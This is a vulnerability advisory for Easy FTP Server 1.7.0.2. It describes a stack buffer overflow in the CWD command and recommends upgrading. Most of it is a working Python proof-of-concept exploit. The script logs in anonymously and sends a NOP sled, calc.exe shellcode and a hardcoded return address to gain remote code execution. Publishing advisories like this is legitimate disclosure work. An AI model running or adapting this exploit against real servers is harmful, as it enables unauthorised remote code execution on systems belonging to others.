* Other vulnerabilities covered in bid:38262 *
=== Infos ===
Credit: loneferret
Found: 18/02/10
Versions affected <= 1.7.0.2
=== Description ===
Lack of input length checks for the CWD command result in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker.
=== Workaround ===
Upgrade to the latest version - 1.7.0.12
=== PoC ===
#!/usr/bin/python
import socket, sys
print """
*************************************************
* Easy FTP Server 1.7.0.2 Remote BoF *
* Discovered by: Jon Butler *
* jonbutler88[at]googlemail[dot]com *
*************************************************
"""
if len(sys.argv) != 3:
print "Usage: ./easyftp.py "
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\xC7\x93\xC2\x77"
"\xFF\xD1\xEB\xF7")
nopsled = "\x90" * (268 - len(shellcode))
ret = "\x58\xFD\x9A\x00"
payload = nopsled + shellcode + ret # 272 bytes
print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n')
try:
s.recv(1024)
print "[!] Exploit failed..."
except:
print "[+] Exploited ^_^"